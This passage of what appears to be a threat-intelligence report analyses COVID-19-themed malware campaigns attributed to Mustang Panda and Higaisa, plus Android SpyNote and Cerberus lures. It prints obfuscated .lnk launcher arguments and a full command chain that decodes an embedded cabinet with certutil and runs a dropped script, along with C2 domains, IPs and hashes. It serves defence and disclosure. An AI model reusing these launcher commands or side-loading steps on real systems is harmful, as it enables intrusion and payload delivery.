Questions</em></p><p>Figure 2 contains text that was translated to English, likely from Chinese due to Mustang Panda being China-based, because of the spelling and grammar errors that would be uncommon for a native speaker. The text poses questions about neutralizing COVID-19 with varying levels of sophistication.</p><p><strong>Document title</strong> - Chi Thi cua thu tuong nguyen xuan phuc.doc</p><p><strong>Hash</strong> - 13d61974d2db537bdb0504cfc53b74a7</p><p style="text-align: center;"><em><strong><img alt="Vietnamese Government Meeting Article from March 3, 2020" src="https://cdn.filestackcontent.com/RLzDfxvnTBOFLYCNC7B4"/><br/> Figure 3</strong> - Vietnamese Government Meeting Article from March 3, 2020</em></p><p>The document in Figure 3 is an article discussing a meeting held by Vietnamese Prime Minister Nguyen Xuan Phuc that was held on March 3, 2020. Other government officials attending the meeting spoke of unity in these times and how approximately 3,000 have been placed in isolation and are under the care of the army. Other topics include overall Coronavirus prevention measures and updates on travel restrictions. The article is publicly available at www.cantho.gov[.]vn, and was likely taken by Mustang Panda from this source as observed by ATR in previous campaigns conducted by the group.</p><h2>Technical Analysis</h2><p>The above mentioned three RAR (compressed files) files each contain a Windows Shortcut (.lnk) file. The .lnk files being utilized by Mustang Panda typically contain an embedded HTA file with VBscript, once executed, will drop and open the decoy document while the malicious activity of the payload runs in the background. ATR observed PlugX and Cobalt Strike being delivered as the primary payloads throughout the campaign.</p><h3>.lnk files</h3><p style="text-align: center;"><em><strong>Table 1</strong> - .lnk file metadata</em></p><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">FileMD5</th><th style="word-wrap: break-word;">LinkModifiedDate</th><th style="word-wrap: break-word;">FileSize</th><th style="word-wrap: break-word;">NameString</th><th style="word-wrap: break-word;">CommandLineArgs</th><th style="word-wrap: break-word;">NetBios Name</th><th style="word-wrap: break-word;">MAC Address</th></tr><tr><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-21-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-67od36i8f4c</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-01-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">cia-at28--planc</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">A4B7FE08900074B6A103D2CF36730421</td><td style="word-wrap: break-word;">11/21/2010 3:24</td><td style="word-wrap: break-word;">302592</td><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-gnhs1vcenrt</td><td style="word-wrap: break-word;">AA:50:18:7E:EB:82</td></tr></tbody></table><h3>Payload Analysis</h3><p>Mustang Panda has used the well known adversary emulation tool called Cobalt Strike as the final payload for the following samples <strong>02-21-1.lnk</strong> and <strong>03-01-1.lnk</strong>. The group has utilized the malleable Command and Control (C2) feature in Cobalt Strike tool to mask the malicious traffic behind a legitimate DNS request to code.jquery.com. The samples mentioned above use 123.51.185[.]75 as their final C2.</p><p>Two notable changes from Mustang Panda previous campaigns identified by ATR are:</p><ul><li>Change in directory <strong>C:UsersPublicMusic</strong> where the payload is dropped</li><li>Usage of the legitimate executable <strong>tencentsoso.exe</strong> that is used for DLL side loading</li></ul><p>The sample <strong>Chi Thi cua thu tuong nguyen xuan phuc.lnk</strong> uses <strong>PlugX</strong> as its final payload. Once executed it drops three files in the directory<strong> C:ProgramDataMicrosoft Malware Protectionydy</strong>. The <strong>unescapp.exe</strong> is a legitimate executable that is signed by “ESET, spol. s r.o.” and it is being abused for DLL hijacking technique to execute http_dll.dll which decodes and loads the malicious payload http_dll.dat. Upon execution of the payload it reaches out to the C2 domain vietnam[.]zing[.]photos and it resolves to 104.160.44[.]85.</p><p style="text-align: center;"><em><strong><img alt="Dropped File Location" src="https://cdn.filestackcontent.com/RXEMSlWiTSiqbrIp0Rgd"/><br/> Figure 4</strong> - Dropped File Location</em></p><p>ATR attributes this activity to Mustang Panda based on the TTPs, targeted countries, and usage of malware families that all have been previously attributed to the group.<sup>[7]</sup></p><h2>Higaisa Activity</h2><p>Covid.pdf.lnk - 21a51a834372ab11fba72fb865d6830e</p><p>On March 15, 2020, ATR identified a malicious .lnk file that utilizes an infection chain similar to other known APT groups. This campaign was found to use C2 infrastructure that overlaps with the Korea-based APT group, Higaisia. The lure document, dropped by the .lnk file, was downloaded from the World Health Organization website, and is likely being used to target English-speaking individuals and entities.</p><p>The .lnk uses a multi stage process to deliver a decory PDF document (Figure 5) and the final payload PlugX and it reaches out to C2 motivation[.]neighboring[.]site and it resolves to 69.172.75[.]223. PlugX is a Remote Access Trojan (RAT) that is commonly used by China-based threat actors.</p><p style="text-align: center;"><em><strong><img alt="World Health Organization Situation Report" src="https://cdn.filestackcontent.com/s7AuHINcQlisMpNyC09n"/><br/> Figure 5</strong> - World Health Organization Situation Report</em></p><h3>Technical Analysis</h3><p>The .lnk file contains an embedded blob of base64 encoded content. Inspecting the .lnk metadata, it appears that the actor has modified them, for example the following fields have been tampered, creation time, Machine ID and MAC address as shown in Figure 6.</p><p style="text-align: center;"><em><strong><img alt=".lnk Metadata" src="https://cdn.filestackcontent.com/eqfWi7L2SbiWLTAI3p0H"/><br/> Figure 6</strong> - .lnk Metadata</em></p><p>Upon execution of the .lnk file, the following commands were run in the background,</p><pre> /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y&amp; for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %tmp%\msoia.exe /y&amp; findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp&gt;%tmp%\cSi1r0uywDNvDu.tmp&amp;%tmp%\ msoia.exe -decode %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp&amp; expand %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% &amp; wscript %tmp%\9sOXN6Ltf0afe7.js</pre><p>The file cSi1r0uywDNvDu.tmp is a <strong>Windows cabinet</strong> (.cab) file. The contents of the cabinet file is shown in Figure 7 below.</p><p style="text-align: center;"><em><strong><img alt="Contents of Cabinet File" src="https://cdn.filestackcontent.com/ul1qz0k5TzOkbB9uFgzY"/><br/> Figure 7</strong> - Contents of Cabinet File</em></p><p>The contents of the cabinet file are extracted using built in windows executable file <strong>extract.exe</strong> and they are renamed as shown in Figure 8.</p><p style="text-align: center;"><em><strong><img alt="Renamed Cabinet File Contents" src="https://cdn.filestackcontent.com/lQYd6ZqxQ4OOjClgNMbT"/><br/> Figure 8</strong> - Renamed Cabinet File Contents</em></p><p>The JavaScript, <strong>9sOXN6Ltf0afe7.js</strong>, performs multiple operations like copying and renaming files, and it uses the living off the land technique to execute the VBscript file <strong>WsmPty.xsl</strong> using <strong>cscript.exe</strong>.<sup>[8]</sup> The VBscript is responsible for creating persistence and it executes the further payloads by abusing the legitimate executable <strong>msostyle.exe</strong>. Upon its execution it loads the file <strong>oinfo12.ocx</strong> (.dll) and it further loads and executes <strong>wordcnvpxy.exe</strong> (PlugX). The malware reaches out to the C2 URL motivation[.]neighboring[.]site/01/index.php.</p><p>Figure 9 and 10 below depicts the overlapping evidence, as mentioned above. The C2 IP, 69.172.75[.]223, was previously used by Higaisa and reported on in late February, 2020.<sup>[9]</sup></p><p style="text-align: center;"><em><strong><img alt="Higaisa C2 Overlap" src="https://cdn.filestackcontent.com/ajDr1oOwS5mDVpgKZYTu"/><br/> Figure 9</strong> - Higaisa C2 Overlap</em></p><p style="text-align: center;"><em><strong><img alt="Higaisa Sample Communication to IP" src="https://cdn.filestackcontent.com/2sT6sKDuRiqyJkJYds6e"/><br/> Figure 10</strong> - Higaisa Sample Communication to IP (https://community.riskiq.com/search/69.172.75.223)</em></p><h2>Mobile Malware</h2><p><strong>APK title</strong> - Avist.apk</p><p><strong>Hash</strong> - 107169ae6951a5cba57d2a0cd274e28fadf5c73d73e91a386f15cf4dc35edd38</p><p>This Android application is fully-functional and will update overall COVID-19 statistics as a normal application would. While the user installs the COVID-19 tracking application, the <strong>SpyNote</strong> RAT is downloaded in the background.</p><p style="text-align: center;"><em><strong><img alt="Installation Request" src="https://cdn.filestackcontent.com/8zK9aw3WSwyxiZbM6dT7"/><br/> Figure 11</strong> - Installation Request</em></p><p style="text-align: center;"><em><strong><img alt="Functional COVID-19 Application Appearance" src="https://cdn.filestackcontent.com/ySvXmueQ0SxCgJUPCjpg"/><br/> Figure 12</strong> - Functional COVID-19 Application Appearance</em></p><p><strong>APK title</strong> - UpdateFlashPlayer_11_5_1.apk</p><p><strong>Hash</strong> - F57a44bec2f7af2da443f068edb0a743f9625ac3a9d686393bacb8e72274b5de</p><p>The Android banking Trojan, Cerberus has been utilizing the attention around the Coronavirus outbreak as an opportunity to push their malware. Using various websites including <strong>coronaviruscovid-19-information[.]com</strong> and <strong>covid19-info[.]online</strong> (among others) to trick users into downloading the Cerberus trojan. Navigating to one of these websites prompts the visitor to download Cerberus that masquerades as an Adobe Flash Player update. Once installed, Cerberus’ primary objective is to steal financial information, however, the trojan can be manipulated depending on the actor’s objective.</p><p style="text-align: center;"><em><strong><img alt="Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)" src="https://cdn.filestackcontent.com/WN4drmBUReyGZH3kmHvI"/><br/> Figure 13 </strong>- Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)</em></p><h2>IOCs</h2><h3>Domains / IPs/ URLs</h3><p>104.160.44[.]85<br/> 123.51.185[.]75<br/> 69.172.75[.]223<br/> vietnam[.]zing[.]photos<br/> motivation[.]neighboring[.]site<br/> http://vietnam.zing.photos:443/update?wd=df07d8ba<br/> motivation[.]neighboring[.]site/01/index.php</p><h3>Hashes</h3><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">File Name</th><th style="word-wrap: break-word;">MD5 Hash</th></tr><tr><td style="word-wrap: break-word;">Http_dll.dat</td><td style="word-wrap: break-word;">0DE06292C0010A4E8F453806373E68D4</td></tr><tr><td style="word-wrap: break-word;">http_dll.dll</td><td style="word-wrap: break-word;">415591D11CF6AEB940AC92C904A1F26A</td></tr><tr><td style="word-wrap: break-word;">02-21-1.rar</td><td style="word-wrap: break-word;">A0D41E87BF259CE882C4977D79FA806A</td></tr><tr><td style="word-wrap: break-word;">03-01-1.rar</td><td style="word-wrap: break-word;">24AF885E38D7CA7912824F2470E5E6BE</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.rar</td><td style="word-wrap: break-word;">60C89B54029442C5E131F01FF08F84C9</td></tr><tr><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td></tr><tr><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td style="word-wrap: break-word;">A4B7FE08900074B6A103D2CF36730421</td></tr><tr><td style="word-wrap: break-word;">3UDBUTNY7YstRc.tmp</td><td style="word-wrap: break-word;">83D04F21515C7E6316F9CD0BB393A118</td></tr><tr><td style="word-wrap: break-word;">486AULMsOPmf6W.tmp</td><td style="word-wrap: break-word;">371E896D818784934BD1456296B99CBE</td></tr><tr><td style="word-wrap: break-word;">9sOXN6Ltf0afe7.js</td><td style="word-wrap: break-word;">4F8FF5E70647DBC5D91326346C393729</td></tr><tr><td style="word-wrap: break-word;">cSi1r0uywDNvDu.tmp</td><td style="word-wrap: break-word;">EEFEB76D26338E09958AAE5D81479178</td></tr><tr><td style="word-wrap: break-word;">MiZl5xsDRylf0W.tmp</td><td style="word-wrap: break-word;">C1D8966FA1BD7AEE41B2C4AD731407D3</td></tr><tr><td style="word-wrap: break-word;">oGhPGUDC03tURV.tmp</td><td style="word-wrap: break-word;">37f78b1ad43959a788162f560bdc9c79</td></tr><tr><td style="word-wrap: break-word;">Covid.pdf.lnk</td><td style="word-wrap: break-word;">21a51a834372ab11fba72fb865d6830e</td></tr><tr><td style="word-wrap: break-word;">Covid.zip</td><td style="word-wrap: break-word;">a89607c9515caeb1d784439a1ee1f208</td></tr><tr><td style="word-wrap: break-word;">Wordcnvpxy.exe</td><td style="word-wrap: break-word;">fd648c3b7495abbe86b850587e2e5431</td></tr><tr><td style="word-wrap: break-word;">20200308-sitrep-48-covid-19.pdf</td><td style="word-wrap: break-word;">FAF5EF01F4A9BF2ABA7EDE67DCC5A2D4</td></tr><tr><td style="word-wrap: break-word;">covid-19.jar</td><td style="word-wrap: break-word;">13c26ea1dc3a2fee403a7913f6f66c03</td></tr><tr><td style="word-wrap: break-word;">covid-precautions .exe</td><td style="word-wrap: break-word;">45a0797b74db206615e92050ecf7b31e</td></tr><tr><td style="word-wrap: break-word;">Basic_protection.pdf</td><td style="word-wrap: break-word;">c9184430cfd1e72ff9213e67f73b06c2</td></tr><tr><td style="word-wrap: break-word;">file2.exe</td><td style="word-wrap: break-word;">ec517204fbcf7a980d137b116afa946d</td></tr><tr><td style="word-wrap: break-word;">CoronaVirus_Video-11032020BRTORS2VYLLOC8NTR7DA79YIM6.vbs</td><td style="word-wrap: break-word;">0a648ccc4c7ce4f4315adc22878c49c2</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name:%22Official%20communication%20by%20Ferribiella%20Italy-CORONAVIRUS%2011.03.2020_EN.exe%22" target="_blank">Official communication by Ferribiella Italy-CORONAVIRUS 11.03.2020_EN.exe</a></td><td style="word-wrap: break-word;">405f2f6fa2077552fa848bb740bd5ffd</td></tr><tr><td style="word-wrap: break-word;">CORONA TREATMENT.doc</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">logday.dll</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">Coronavirus_disease_COVID-19__773315073441331.doc</td><td style="word-wrap: break-word;">8ff6621ecf76a5632dc7ca459f3e5a89</td></tr><tr><td style="word-wrap: break-word;">卫生部指令.docx</td><td style="word-wrap: break-word;">3519b57181da2548b566d3c49f2bae18</td></tr><tr><td style="word-wrap: break-word;">武汉旅行信息收集申请表.xlsm</td><td style="word-wrap: break-word;">b08dc707dcbc1604cfd73b97dc91a44c</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name%253A%2522POEA%2520HEALTH%2520ADVISORY%2520re-2020%2520Novel%2520Corona%2520Virus.pdf.exe%2522" target="_blank">POEA HEALTH ADVISORY re-2020 Novel Corona Virus.pdf.exe</a></td><td style="word-wrap: break-word;">f59c558d9b33a25ac8b32f495f6fd035</td></tr><tr><td style="word-wrap: break-word;">COVID-19_Tracker.exe</td><td style="word-wrap: break-word;">595149b8dcab35fde269a86d0bd74756</td></tr><tr><td style="word-wrap: break-word;">Avist.apk</td><td style="word-wrap: break-word;">660159f431b5f8ec8c4fed0298168d1a</td></tr><tr><td style="word-wrap: break-word;">https://covid19-info[.]online/UpdateFlashPlayer_11_5_1.apk</td><td style="word-wrap: break-word;">3382348f9618058dde3aacffcb34982e</td></tr><tr><td style="word-wrap: break-word;">Corona Virus Advice For Public____________________pdf.exe</td><td style="word-wrap: break-word;">8a228725fe66ab52a62eb44687ad0680</td></tr><tr><td style="word-wrap: break-word;">St John of God Health Care (COVID-19) Notice.pdf</td><td style="word-wrap: break-word;">19fda4048f29fbf6e0c9e0a4b8bd0946</td></tr><tr><td style="word-wrap: break-word;">Download PDF File - Coronavirus Disease 2019 Controls scr</td><td style="word-wrap: break-word;">e7fab8e420dd74157bc4dcc5ab396dc8</td></tr></tbody></table><h3>Other Coronavirus-themed Hashes</h3><p>a70a55e62c963d58817e5087fe9fe7e3<br/> 3a2438dd2c13c48ce7867a9ebefc9e5a<br/> 9ca4f31fb9707adc43d9b7e630b2cf26<br/> fb525e13cb82ea91b9d7576e3078674c<br/> dc0d41af833054bc8fd6fa3894fed188<br/> a61ab959038859f3a185ab688271894c<br/> e53ce7efb47a1ea67fa8df6621f2294b<br/> 98051bcea1ec152a80c6acaa4e46a069<br/> f908dc8852f659dd43a8dc25f3d74c2e<br/> 62a5677e30343bc14078b97148d67036<br/> 71b3db4cf0a03c8650c140e023a06793<br/> bb512de5decd3a2428407660ff57678c<br/> 2e1ea39e25dde32a9a36078ac59db814<br/> 1e85dd017cd9f9d856e5943e8824009e<br/> 3bc7a303e48a39b0582cb6aa888b6f49<br/> e5ce3207e8e7019bd0f0963956267128<br/> af5ce343c7e4c64319c658c87b85f9a6<br/> 002e017b97eda9eaae523a0a9a518d84<br/> 26b95d45df0744d11cf1d91f5629ba87<br/> 2d79034d853b32423b1e06c3f27bfc61<br/> 0fb5cc4ac25234239d291e40b47c98d3<br/> fc20439e60e168f7bc5b1afd0a31e015<br/> b0ef3735aaf9ea9de69848d7131c6942<br/> a0045f26111de6b079dc0bffd5aef4e6<br/> 4b30f50d1a8f8c12bca8fd436c1469fd<br/> b3f496ce13ff6fed1048399e1fc89403<br/> 7b4a3d320a888059a6328a61f21d9095<br/> 8bd336d4dcdc4f45a9a5c72d5791f6a8<br/> 55879cddb0e18c34aaa992d24690e0e7<br/> 320cde0e1b34e03f0ea393a0483b6798</p><h2>Conclusion</h2><p>Threat actors are opportunistic and will continuously update themes of their malicious campaigns in whichever way they believe will increase the chances of completing an objective. Commodity malware will change to whatever themes are relevant to the current period in time. As discussed in this report, threat actors are still utilizing TTPs known about and discussed in the security community, it is only the content of social engineering documents that has changed.</p><p>The Coronavirus effect is world-wide and increasingly affecting individuals in real life and online. We hope everyone is doing their best to stay safe during these times. Additional information on the Coronavirus can be found on the following websites:</p><ul><li><a href="https://www.cdc.gov/coronavirus/2019-ncov/index.html" target="_blank">https://www.cdc.gov/coronavirus/2019-ncov/index.html</a></li><li><a href="https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public" target="_blank">https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public</a></li></ul><h2>Endnotes</h2><p><sup>[1]</sup> CISA, “Defending Against COVID-19 Cyber Scams,” US-CERT, accessed March 17, 2020, published March 6, 2020, <a href="https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams" target="_blank">https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams</a>; Insikt Group, “Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide,” Recorded Future, accessed March 17, 2020, published March 12, 2020,  <a href="https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf" target="_blank">https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf</a>.</p><p><sup>[2]</sup> “Rolling updates on Coronavirus disease (COVID-19),” World Health Organization, accessed March 17, 2020, published March 18, 2020, <a href="https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen" target="_blank">https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen</a>.</p><p><sup>[3]</sup> Nick Biasini and Edmund Brumghin, “Threat actors attempt to capitalize on coronavirus outbreak,” Cisco Talos Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html" target="_blank">https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html</a>; “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/" target="_blank">https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/</a>.</p><p><sup>[4]</sup> “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog.</p><p><sup>[5]</sup> Anomali Threat Research Team, “Multiple Chinese Threat Groups Exploiting CVE-2018-0798 Equation Editor Vulnerability Since Late 2018,” Anomali Blog, accessed March 17, 2020, published July 3, 2019, <a href="https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018">https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018</a>.</p><p><sup>[6]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations,” Anomali Blog, accessed March 17, 2020, published October 7, 2019, <a href="https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations">https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations</a>.</p><p><sup>[7]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations,” Anomali Blog.</p><p><sup>[8]</sup> “/ winrm.vbs,” Living Off The Land Binaries and Scripts (and also Libraries), accessed March 20, 2020, <a href="https://lolbas-project.github.io/lolbas/Scripts/Winrm/" target="_blank">https://lolbas-project.github.io/lolbas/Scripts/Winrm/</a>.</p><p><sup>[9]</sup> “Higaisa” Recent Attack Activity Report,” Tencent Security Threat Intelligence Center, accessed March 18, 2020, published February 27, 2020, <a href="https://s.tencent.com/research/report/895.html" target="_blank">https://s.tencent.com/research/report/895.html</a>.</p>

Get the Latest Anomali Updates and Cybersecurity News – Straight To Your Inbox

Become a subscriber to the Anomali Newsletter
Receive a monthly summary of our latest threat intelligence content, research, news, events, and more.